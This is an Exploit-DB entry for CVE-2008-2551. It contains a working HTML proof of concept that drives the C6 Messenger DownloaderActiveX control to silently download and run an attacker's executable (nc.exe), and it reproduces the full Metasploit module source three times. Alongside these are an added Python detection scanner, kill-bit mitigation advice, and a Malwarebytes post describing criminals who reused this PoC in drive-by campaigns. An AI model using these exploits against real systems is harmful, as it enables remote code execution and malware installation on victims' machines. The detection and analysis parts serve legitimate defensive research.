ID EDB-ID:5732 Type exploitdb Reporter Nine:Situations:Group Modified 2008-06-03T00:00:00
Description
C6 Messenger ActiveX Remote Download & Execute Exploit. CVE-2008-2551. Remote exploit for the Windows platform.
<!--
C6 Messenger Installation Url DownloaderActiveX Control Remote Download
& Execute Exploit
by
Nine:Situations:Group::SnoopyAssault
site: http://retrogod.altervista.org/
"C6 Messenger is an instant messaging program produced by Telecom Italia Group,
specifically by Alice (distribution), Icona SpA (development, design and server)
and Opendoc (graphics). It is the only instant messenger entirely produced in
Italy; it is a free program and allows you to chat in real time with friends[..]"
installation urls:
http://c6.community.alice.it/home/index.html
http://c6.community.alice.it/download/c6.html
Whoever installed the C6 IM client from the second URL with Internet Explorer
has the DownloaderActiveX control registered and is exposed to this threat.
The control performs no host check on the "propDownloadUrl" property: it
fetches whatever URL the page supplies, local URLs included, so the Internet
zone restrictions are bypassed. Setting "propPostDownloadAction" to "run"
launches the downloaded file once the transfer completes. A progress bar is
normally shown, but it is easily hidden (the PoC below zeroes the element
size and the propWidth/propHeight parameters).
settings:
RegKey Safe for Script: False
RegKey Safe for Init: False
Implements IObjectSafety: True
IDisp Safe: Safe for untrusted: caller,data
IPersist Safe: Safe for untrusted: caller,data
The control is not marked safe in the registry, but it implements
IObjectSafety and reports itself safe for untrusted callers and data, so
Internet Explorer treats it as safe for scripting and initialization and will
load it from any web page. Until it is fixed or unregistered, the standard
mitigation is the kill bit: set the "Compatibility Flags" DWORD to 0x400 under
HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{c1b7e532-3ecb-4e9e-bb3a-2951ffe67c61}
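As an added example (not part of the original advisory and not the vendor's code), the following Python scanner picks out pages built on this PoC the way later drive-by campaigns reused it: it parses the OBJECT/PARAM markup, matches the DownloaderActiveX CLSID, and reports whether propPostDownloadAction is "run", the download URL to block, and whether the progress bar was hidden by zero sizes. Only the CLSID and the prop* parameter names come from the advisory; the sample pages and the hosts dropper.example and c6.example are constructed placeholders.

```python
"""Added example (not code from the advisory or the vendor): flag web pages
that instantiate the C6 Messenger DownloaderActiveX control in its
download-and-run configuration. Only the CLSID and the prop* parameter names
come from the advisory; sample pages and hosts below are constructed."""
from dataclasses import dataclass, field
from html.parser import HTMLParser

C6_DOWNLOADER_CLSID = "c1b7e532-3ecb-4e9e-bb3a-2951ffe67c61"  # from the advisory


@dataclass
class ObjectTag:
    classid: str
    attrs: dict
    params: dict = field(default_factory=dict)


class ObjectCollector(HTMLParser):
    """Collect every <object> with its <param> children. html.parser lowercases
    tag and attribute names, so the PoC's upper-case markup matches too."""

    def __init__(self):
        super().__init__()
        self.objects = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "object":
            self._current = ObjectTag(classid=a.get("classid", ""), attrs=a)
            self.objects.append(self._current)
        elif tag == "param" and self._current is not None:  # <param> is void: start tag only
            self._current.params[a.get("name", "").lower()] = a.get("value", "")

    def handle_endtag(self, tag):
        if tag == "object":
            self._current = None


def normalize_clsid(value):
    """'CLSID:{C1B7E532-...}' or 'clsid:c1b7e532-...' -> 'c1b7e532-...'."""
    v = value.strip().lower()
    return v[6:].strip("{}") if v.startswith("clsid:") else v.strip("{}")


def _is_zero(value):
    return value.strip() == "0"


def scan_html(html):
    """One finding per C6 DownloaderActiveX instantiation in the page.

    verdict is 'download_and_execute' when propPostDownloadAction is 'run' and a
    propDownloadUrl is set (the combination the advisory describes), otherwise
    'download_only'; hidden records a zeroed element size or propWidth/propHeight."""
    collector = ObjectCollector()
    collector.feed(html)
    collector.close()
    findings = []
    for obj in collector.objects:
        if normalize_clsid(obj.classid) != C6_DOWNLOADER_CLSID:
            continue
        p = obj.params
        action = p.get("proppostdownloadaction", "").strip().lower()
        url = p.get("propdownloadurl", "").strip()
        hidden = ((_is_zero(obj.attrs.get("width", "")) or _is_zero(p.get("propwidth", "")))
                  and (_is_zero(obj.attrs.get("height", "")) or _is_zero(p.get("propheight", ""))))
        findings.append({
            "verdict": "download_and_execute" if action == "run" and url else "download_only",
            "download_url": url,  # indicator to block at the proxy
            "hidden": hidden,
        })
    return findings


# Constructed samples. SAMPLE_POC mirrors the shape of the advisory's PoC.
SAMPLE_POC = """<HTML><BODY>
<OBJECT ID="DownloaderActiveX1" WIDTH="0" HEIGHT="0"
 CLASSID="CLSID:c1b7e532-3ecb-4e9e-bb3a-2951ffe67c61"
 CODEBASE="DownloaderActiveX.cab#Version=1,0,0,1">
<PARAM NAME="propWidth" VALUE="0">
<PARAM NAME="propHeight" VALUE="0">
<PARAM NAME="propDownloadUrl" VALUE="http://dropper.example/nc.exe">
<PARAM NAME="propPostDownloadAction" VALUE="run">
</OBJECT></BODY></HTML>"""

# Same control, visible, no post-download action: log it, but it is not the exploit.
SAMPLE_DOWNLOAD_ONLY = """<object classid="clsid:{C1B7E532-3ECB-4E9E-BB3A-2951FFE67C61}" width="400" height="40">
<param name="propDownloadUrl" value="http://c6.example/setup.exe">
<param name="propPostDownloadAction" value="">
</object>"""

# Different CLSID (placeholder nil GUID) with the same parameter names: must not match.
SAMPLE_OTHER = """<object classid="clsid:00000000-0000-0000-0000-000000000000" width="0" height="0">
<param name="propDownloadUrl" value="http://dropper.example/x.exe">
<param name="propPostDownloadAction" value="run">
</object>"""

if __name__ == "__main__":
    for name, page in (("poc", SAMPLE_POC), ("download_only", SAMPLE_DOWNLOAD_ONLY), ("other", SAMPLE_OTHER)):
        print(name, scan_html(page))
```

Run it as a script to print the findings for the three constructed samples; in practice feed it response bodies from a web proxy or the HTML captured alongside a suspicious DownloaderActiveX.cab request. It matches only this CLSID; other download-and-execute controls need their own entries.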
info:
http://www.google.com/search?hl=en&q=c1b7e532-3ecb-4e9e-bb3a-2951ffe67c61&meta=&num=100&filter=0
Let me guess, this one is already exploited in the wild...
Thanks Mommy Telecom Italia!!
If you think this PoC is useful, please help us improve our equipment and
donate through the PayPal button on our site!
--------------------------------------------------------------------------------
Goodbye rgod-tsid-pah he-ru-ka!
-->
<HTML>
<BODY>
<OBJECT ID="DownloaderActiveX1"
WIDTH="0"
HEIGHT="0"
CLASSID="CLSID:c1b7e532-3ecb-4e9e-bb3a-2951ffe67c61"
CODEBASE="DownloaderActiveX.cab#Version=1,0,0,1">
<PARAM NAME="propProgressBackground" VALUE="#bccee8">
<PARAM NAME="propTextBackground" VALUE="#f7f8fc">
<PARAM NAME="propBarColor" VALUE="#df0203">
<PARAM NAME="propTextColor" VALUE="#000000">
<PARAM NAME="propWidth" VALUE="0">
<PARAM NAME="propHeight" VALUE="0">
<PARAM NAME="propDownloadUrl" VALUE="http://yoursite.com/nc.exe"><!-- change to your favourite kit ! :) -->
<PARAM NAME="propPostDownloadAction" VALUE="run"> <!-- lol -->
<PARAM NAME="propInstallCompleteUrl" VALUE="">
<PARAM NAME="propBrowserRedirectUrl" VALUE="">
<PARAM NAME="propVerbose" VALUE="0">
<PARAM NAME="propInterrupt" VALUE="0">
</OBJECT>
</BODY>
</HTML>
# milw0rm.com [2008-06-03]
{"cve": [{"lastseen": "2021-02-02T05:35:14", "description": "The DownloaderActiveX Control (DownloaderActiveX.ocx) in Icona SpA C6 Messenger 1.0.0.1 allows remote attackers to force the download and execution of arbitrary files via a URL in the propDownloadUrl parameter with the propPostDownloadAction parameter set to \"run.\"", "edition": 4, "cvss3": {}, "published": "2008-06-04T23:32:00", "title": "CVE-2008-2551", "type": "cve", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": true, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-2551"], "modified": "2018-10-11T20:41:00", "cpe": ["cpe:/a:icona:instant_messenger:1.0.0.1"], "id": "CVE-2008-2551", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-2551", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:icona:instant_messenger:1.0.0.1:*:*:*:*:*:*:*"]}], "metasploit": [{"lastseen": "2020-10-06T04:24:28", "description": "This module exploits a vulnerability in Icona SpA C6 Messenger 1.0.0.1. The vulnerability is in the DownloaderActiveX Control (DownloaderActiveX.ocx). 
The insecure control can be abused to download and execute arbitrary files in the context of the currently logged-on user.\n", "published": "1976-01-01T00:00:00", "type": "metasploit", "title": "Icona SpA C6 Messenger DownloaderActiveX Control Arbitrary File Download and Execute", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-2551"], "modified": "1976-01-01T00:00:00", "id": "MSF:EXPLOIT/WINDOWS/BROWSER/C6_MESSENGER_DOWNLOADERACTIVEX", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::EXE\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Icona SpA C6 Messenger DownloaderActiveX Control Arbitrary File Download and Execute',\n 'Description' => %q{\n This module exploits a vulnerability in Icona SpA C6 Messenger 1.0.0.1. The\n vulnerability is in the DownloaderActiveX Control (DownloaderActiveX.ocx). 
The\n insecure control can be abused to download and execute arbitrary files in the context of\n the currently logged-on user.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown', # Nine:Situations:Group::SnoopyAssault, vulnerability discovery and exploit\n 'juan vazquez' # metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2008-2551' ],\n [ 'OSVDB', '45960' ],\n [ 'BID', '29519' ]\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => \"none\",\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Payload' =>\n {\n 'Space' => 2048,\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', { } ],\n ],\n 'DisclosureDate' => 'Jun 03 2008',\n 'DefaultTarget' => 0,\n 'Privileged' => false))\n end\n\n def autofilter\n false\n end\n\n def check_dependencies\n use_zlib\n end\n\n def on_request_uri(cli, request)\n\n # Only IEs are potential targets\n # \"File Session\" is used when the ActiveX tries to request the EXE\n agent = request.headers['User-Agent']\n if agent !~ /MSIE \\d\\.\\d|File Session/\n print_error(\"Target not supported: #{agent}\")\n return\n end\n\n payload_url = \"http://\"\n payload_url += (datastore['SRVHOST'] == '0.0.0.0') ? 
Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']\n payload_url += \":\" + datastore['SRVPORT'].to_s + get_resource() + \"/#{@payload_rand}\"\n\n if (request.uri.match(/#{@payload_rand}/))\n return if ((p = regenerate_payload(cli)) == nil)\n data = generate_payload_exe({ :code => p.encoded })\n print_status(\"Sending EXE payload\")\n send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })\n return\n end\n\n exe = rand_text_alpha(rand(5) + 1 )\n\n content = %Q|\n <html>\n <object id=\"DownloaderActiveX1\" width=\"0\" height=\"0\" classid=\"CLSID:c1b7e532-3ecb-4e9e-bb3a-2951ffe67c61\" codebase=\"DownloaderActiveX.cab#Version=1,0,0,1\">\n <param name=\"propProgressBackground\" value=\"#bccee8\">\n <param name=\"propTextBackground\" value=\"#f7f8fc\">\n <param name=\"propBarColor\" value=\"#df0203\">\n <param name=\"propTextColor\" value=\"#000000\">\n <param name=\"propWidth\" value=\"0\">\n <param name=\"propHeight\" value=\"0\">\n <param name=\"propDownloadUrl\" value=\"#{payload_url}/#{exe}.exe\">\n <param name=\"propPostDownloadAction\" value=\"run\">\n <param name=\"propInstallCompleteUrl\" value=\"\">\n <param name=\"propBrowserRedirectUrl\" value=\"\">\n <param name=\"propVerbose\" value=\"0\">\n <param name=\"propInterrupt\" value=\"0\">\n </OBJECT>\n </html>\n |\n\n print_status(\"Sending #{self.name}\")\n\n send_response_html(cli, content)\n\n handler(cli)\n\n end\n\n def exploit\n @payload_rand = rand_text_alpha(rand(5) + 5 )\n super\n end\nend\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/browser/c6_messenger_downloaderactivex.rb"}], "packetstorm": [{"lastseen": "2016-12-05T22:12:08", "description": "", "published": "2012-02-03T00:00:00", "type": "packetstorm", "title": "Icona SpA C6 Messenger Downloader Arbitrary File Download / Execute", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-2551"], 
"modified": "2012-02-03T00:00:00", "id": "PACKETSTORM:109390", "href": "https://packetstormsecurity.com/files/109390/Icona-SpA-C6-Messenger-Downloader-Arbitrary-File-Download-Execute.html", "sourceData": "`## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpServer::HTML \ninclude Msf::Exploit::EXE \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Icona SpA C6 Messenger DownloaderActiveX Control Arbitrary File Download and Execute', \n'Description' => %q{ \nThis module exploits a vulnerability in Icona SpA C6 Messenger 1.0.0.1. The \nvulnerability is in the DownloaderActiveX Control (DownloaderActiveX.ocx). The \ninsecure control can be abused to download and execute arbitrary files in the context of \nthe currently logged-on user. 
\n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Nine:Situations:Group::SnoopyAssault', # Vulnerability discovery and exploit \n'juan vazquez' # metasploit module \n], \n'References' => \n[ \n[ 'CVE', '2008-2551' ], \n[ 'OSVDB', '45960' ], \n[ 'BID', '29519' ], \n[ 'URL', 'http://retrogod.altervista.org/9sg_c6_download_exec.html' ], \n], \n'DefaultOptions' => \n{ \n'ExitFunction' => \"none\", \n'InitialAutoRunScript' => 'migrate -f' \n}, \n'Payload' => \n{ \n'Space' => 2048, \n'StackAdjustment' => -3500, \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'Automatic', { } ], \n], \n'DisclosureDate' => 'Jun 03 2008', \n'DefaultTarget' => 0, \n'Privileged' => false)) \nend \n \ndef autofilter \nfalse \nend \n \ndef check_dependencies \nuse_zlib \nend \n \ndef on_request_uri(cli, request) \n \n# Only IEs are potential targets \n# \"File Session\" is used when the ActiveX tries to request the EXE \nagent = request.headers['User-Agent'] \nif agent !~ /MSIE \\d\\.\\d|File Session/ \nprint_error(\"Target not supported: #{cli.peerhost}:#{cli.peerport} (#{agent})\") \nreturn \nend \n \npayload_url = \"http://\" \npayload_url += (datastore['SRVHOST'] == '0.0.0.0') ? 
Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST'] \npayload_url += \":\" + datastore['SRVPORT'] + get_resource() + \"/#{@payload_rand}\" \n \nif (request.uri.match(/#{@payload_rand}/)) \nreturn if ((p = regenerate_payload(cli)) == nil) \ndata = generate_payload_exe({ :code => p.encoded }) \nprint_status(\"Sending EXE payload to #{cli.peerhost}:#{cli.peerport}...\") \nsend_response(cli, data, { 'Content-Type' => 'application/octet-stream' }) \nreturn \nend \n \nexe = rand_text_alpha(rand(5) + 1 ) \n \ncontent = %Q| \n<html> \n<object id=\"DownloaderActiveX1\" width=\"0\" height=\"0\" classid=\"CLSID:c1b7e532-3ecb-4e9e-bb3a-2951ffe67c61\" codebase=\"DownloaderActiveX.cab#Version=1,0,0,1\"> \n<param name=\"propProgressBackground\" value=\"#bccee8\"> \n<param name=\"propTextBackground\" value=\"#f7f8fc\"> \n<param name=\"propBarColor\" value=\"#df0203\"> \n<param name=\"propTextColor\" value=\"#000000\"> \n<param name=\"propWidth\" value=\"0\"> \n<param name=\"propHeight\" value=\"0\"> \n<param name=\"propDownloadUrl\" value=\"#{payload_url}/#{exe}.exe\"> \n<param name=\"propPostDownloadAction\" value=\"run\"> \n<param name=\"propInstallCompleteUrl\" value=\"\"> \n<param name=\"propBrowserRedirectUrl\" value=\"\"> \n<param name=\"propVerbose\" value=\"0\"> \n<param name=\"propInterrupt\" value=\"0\"> \n</OBJECT> \n</html> \n| \n \nprint_status(\"Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...\") \n \nsend_response_html(cli, content) \n \nhandler(cli) \n \nend \n \ndef exploit \n@payload_rand = rand_text_alpha(rand(5) + 5 ) \nsuper \nend \n \nend \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/109390/c6_messenger_downloaderactivex.rb.txt"}], "exploitdb": [{"lastseen": "2016-02-02T09:45:22", "description": "Icona SpA C6 Messenger DownloaderActiveX Control Arbitrary File Download and Execute. CVE-2008-2551. 
Remote exploit for windows platform", "published": "2012-02-02T00:00:00", "type": "exploitdb", "title": "Icona SpA C6 Messenger DownloaderActiveX Control Arbitrary File Download and Execute", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-2551"], "modified": "2012-02-02T00:00:00", "id": "EDB-ID:18449", "href": "https://www.exploit-db.com/exploits/18449/", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = ExcellentRanking\r\n\r\n\tinclude Msf::Exploit::Remote::HttpServer::HTML\r\n\tinclude Msf::Exploit::EXE\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Icona SpA C6 Messenger DownloaderActiveX Control Arbitrary File Download and Execute',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a vulnerability in Icona SpA C6 Messenger 1.0.0.1. The\r\n\t\t\t\tvulnerability is in the DownloaderActiveX Control (DownloaderActiveX.ocx). 
The\r\n\t\t\t\tinsecure control can be abused to download and execute arbitrary files in the context of\r\n\t\t\t\tthe currently logged-on user.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'Nine:Situations:Group::SnoopyAssault', # Vulnerability discovery and exploit\r\n\t\t\t\t\t'juan vazquez' # metasploit module\r\n\t\t\t\t],\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2008-2551' ],\r\n\t\t\t\t\t[ 'OSVDB', '45960' ],\r\n\t\t\t\t\t[ 'BID', '29519' ],\r\n\t\t\t\t\t[ 'URL', 'http://retrogod.altervista.org/9sg_c6_download_exec.html' ],\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'ExitFunction' => \"none\",\r\n\t\t\t\t\t'InitialAutoRunScript' => 'migrate -f'\r\n\t\t\t\t},\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 2048,\r\n\t\t\t\t\t'StackAdjustment' => -3500,\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'Automatic', { } ],\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Jun 03 2008',\r\n\t\t\t'DefaultTarget' => 0,\r\n\t\t\t'Privileged' => false))\r\n\tend\r\n\r\n\tdef autofilter\r\n\t\tfalse\r\n\tend\r\n\r\n\tdef check_dependencies\r\n\t\tuse_zlib\r\n\tend\r\n\r\n\tdef on_request_uri(cli, request)\r\n\r\n\t\t# Only IEs are potential targets\r\n\t\t# \"File Session\" is used when the ActiveX tries to request the EXE\r\n\t\tagent = request.headers['User-Agent']\r\n\t\tif agent !~ /MSIE \\d\\.\\d|File Session/\r\n\t\t\tprint_error(\"Target not supported: #{cli.peerhost}:#{cli.peerport} (#{agent})\")\r\n\t\t\treturn\r\n\t\tend\r\n\r\n\t\tpayload_url = \"http://\"\r\n\t\tpayload_url += (datastore['SRVHOST'] == '0.0.0.0') ? 
Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']\r\n\t\tpayload_url += \":\" + datastore['SRVPORT'] + get_resource() + \"/#{@payload_rand}\"\r\n\r\n\t\tif (request.uri.match(/#{@payload_rand}/))\r\n\t\t\treturn if ((p = regenerate_payload(cli)) == nil)\r\n\t\t\tdata = generate_payload_exe({ :code => p.encoded })\r\n\t\t\tprint_status(\"Sending EXE payload to #{cli.peerhost}:#{cli.peerport}...\")\r\n\t\t\tsend_response(cli, data, { 'Content-Type' => 'application/octet-stream' })\r\n\t\t\treturn\r\n\t\tend\r\n\r\n\t\texe = rand_text_alpha(rand(5) + 1 )\r\n\r\n\t\tcontent = %Q|\r\n\t\t<html>\r\n\t\t\t<object id=\"DownloaderActiveX1\" width=\"0\" height=\"0\" classid=\"CLSID:c1b7e532-3ecb-4e9e-bb3a-2951ffe67c61\" codebase=\"DownloaderActiveX.cab#Version=1,0,0,1\">\r\n\t\t\t\t<param name=\"propProgressBackground\" value=\"#bccee8\">\r\n\t\t\t\t<param name=\"propTextBackground\" value=\"#f7f8fc\">\r\n\t\t\t\t<param name=\"propBarColor\" value=\"#df0203\">\r\n\t\t\t\t<param name=\"propTextColor\" value=\"#000000\">\r\n\t\t\t\t<param name=\"propWidth\" value=\"0\">\r\n\t\t\t\t<param name=\"propHeight\" value=\"0\">\r\n\t\t\t\t<param name=\"propDownloadUrl\" value=\"#{payload_url}/#{exe}.exe\">\r\n\t\t\t\t<param name=\"propPostDownloadAction\" value=\"run\">\r\n\t\t\t\t<param name=\"propInstallCompleteUrl\" value=\"\">\r\n\t\t\t\t<param name=\"propBrowserRedirectUrl\" value=\"\">\r\n\t\t\t\t<param name=\"propVerbose\" value=\"0\">\r\n\t\t\t\t<param name=\"propInterrupt\" value=\"0\">\r\n\t\t\t</OBJECT>\r\n\t\t</html>\r\n\t\t|\r\n\r\n\t\tprint_status(\"Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...\")\r\n\r\n\t\tsend_response_html(cli, content)\r\n\r\n\t\thandler(cli)\r\n\r\n\tend\r\n\r\n\tdef exploit\r\n\t\t@payload_rand = rand_text_alpha(rand(5) + 5 )\r\n\t\tsuper\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": 
"https://www.exploit-db.com/download/18449/"}], "malwarebytes": [{"lastseen": "2018-02-22T16:50:35", "bulletinFamily": "blog", "cvelist": ["CVE-2008-2551", "CVE-2008-25511", "CVE-2015-5119", "CVE-2015-51191", "CVE-2016-0189", "CVE-2016-01891"], "description": "During our web crawls we sometimes come across bizarre findings or patterns we haven't seen before. This was the case with a particular drive-by download attack planted on Chinese websites. While by no means advanced (it turned out to be fairly buggy), we witnessed a threat actor experimenting with several different exploits to drop malware.\n\nFor years we have cataloged thousands of Chinese websites injected with the same malicious and rudimentary VBScript code. Even to this day, you can find a countless number of sites that have been (or still are) compromised with that pattern, and most of them happen to be hosted in China.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/urlquery_results.png> \"\" )\n\nThe campaign we stumbled upon starts with sites that were compromised to load external content via scripts and iframe overlays. 
Although the browser's address bar shows _gusto-delivery[.]com_, there are several injected layers that expose visitors to unwanted code and malware.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/site_view1.png> \"\" )\n\nFor instance, we find a reference to a Coinhive clone_:_\n \n \n var miner = new ProjectPoi.User('LUdKfdXyeXp9sQZf1pphGOrY', 'john-doe', {\n threads: navigator.hardwareConcurrency,\n autoThreads: false,\n throttle: 0.2,\n forceASMJS: false\n });\n miner.start();\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/Coinhive_clone1.png> \"\" )\n\nWe are unsure whether this is a pure ripoff (the website template is almost identical), but one is different from the other in that the Chinese version (hosted at _ppoi[.]org_) only takes a 10 percent commission as opposed to 30 percent for Coinhive.\n \n \n \u4e5f\u5c31\u662f\u8bf4\uff0c\u60a8\u5c06\u83b7\u5f97\u6316\u77ff\u6536\u76ca\u768490%\uff0c\u4e0e\u77ff\u6c60\u4e0d\u540c\uff0c\u8fd9\u4e2a\u6536\u76ca\u662f\u56fa\u5b9a\u7684\uff0c\u4e0d\u8bba\u662f\u5426\u7206\u5757\u60a8\u90fd\u5c06\u83b7\u5f97\u8be5\u7b14\u6536\u76ca\n \u6211\u4eec\u5e0c\u671b\u4fdd\u755910%\u6765\u8865\u507f\u4e0d\u7206\u5757\u7684\u635f\u5931\uff0c\u7ef4\u6301\u670d\u52a1\u5668\u7684\u8fd0\u884c\u7b49\n \n I.e. you get 90% of the average XMR we earn. Unlike a traditional mining pool, this\n rate is fixed, regardless of actual blocks found and the luck involved finding them. 
\n We keep 10% for us to operate this service and to (hopefully) turn a profit.\n\nFinally, the most interesting aspect here is the redirection to a server hosting a few exploits as described in the diagram below:\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/Flow.png> \"\" )\n\nOn top of a late addition of the aforementioned VBScript similar to the ones found on other Chinese websites, we notice the inclusion of 3 exploits targeting older vulnerabilities in an ActiveX component, the Flash Player and Internet Explorer.\n\n**CVE-2008-2551**\n\nThis old CVE is a vulnerability with the C6 Messenger ActiveX control. The threat actor reused the same code already published [here](<https://www.exploit-db.com/exploits/5732/>) and simply altered the DownloadUrl to point to their malicious binary. Users (unless their browser settings have been changed) will be presented with a prompt asking them to install this piece of malware.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/CVE-2008-25511.png> \"\" )\n\n**CVE-2015-5119**\n\nThis is a Flash Player vulnerability affecting Flash up to version 18.0.0.194, which was again lifted from a proof of concept. Its implementation in this particular drive-by is somewhat unstable though and may cause the browser to crash.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/CVE-2015-51191.png> \"\" )\n\n**CVE-2016-0189**\n\nFinally a more interesting CVE, the well-known Internet Explorer God Mode, although for some unexplained reason, the code was commented out.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/CVE-2016-01891.png> \"\" )\n\nThe final payload dropped in this campaign is a DDoS bot, which we will cover in another blog post.\n\n### Conclusion\n\nAlthough we see the use of several exploits, we cannot call this an exploit kit\u2014not even an amateur one. 
Indeed, the domain serving the exploits appears to be static and the URIs are always the same.\n\nRegardless, it does not prevent threat actors from arranging drive-by attacks by copying and pasting various pieces of code they can find here and there. While not very effective, they may still be able to compromise some legacy systems or machines that have not been patched.\n\n### Indicators of compromise\n\nMalicious redirection\n \n \n vip.rm028[].cn\n by007[.]cn\n\nExploit domain and IP\n \n \n shiquanxian.cn\n 103.85.226.65\n\nCVE-2008-2551\n \n \n 5E3AC16B7F55CA52A7B4872758F19D09BD4994190B9D114D68CAB9F1D9D5B467\n\nCVE-2015-5119\n \n \n D53F3FE4354ACFE7BD12528C20DA513DCEFA98B1D60D939BDE32C0815014137E\n\nPayload\n \n \n 65ABED6C77CC219A090EBEF73D6A526FCCEDAA391FBFDCB4B416D0845B3D0DBC\n\nThe post [Drive-by download campaign targets Chinese websites, experiments with exploits](<https://blog.malwarebytes.com/threat-analysis/2018/02/chinese-criminal-experiments-with-exploits-in-drive-by-download-campaign/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "modified": "2018-02-22T16:00:00", "published": "2018-02-22T16:00:00", "id": "MALWAREBYTES:FD11436A13A56E314FE7438DEDAF9FBA", "href": "https://blog.malwarebytes.com/threat-analysis/2018/02/chinese-criminal-experiments-with-exploits-in-drive-by-download-campaign/", "type": "malwarebytes", "title": "Drive-by download campaign targets Chinese websites, experiments with exploits", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:32", "bulletinFamily": "software", "cvelist": ["CVE-2009-0550", "CVE-2009-0553", "CVE-2009-0554", "CVE-2009-0551", "CVE-2008-2551", "CVE-2009-0552", "CVE-2008-2540", "CVE-2008-2550"], "description": "Code exexuction, multiple memory corruptions, NTLM relaying.", "edition": 1, "modified": "2009-04-20T00:00:00", "published": "2009-04-20T00:00:00", "id": 
"SECURITYVULNS:VULN:9839", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:9839", "title": "Microsoft Internet Explorer multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}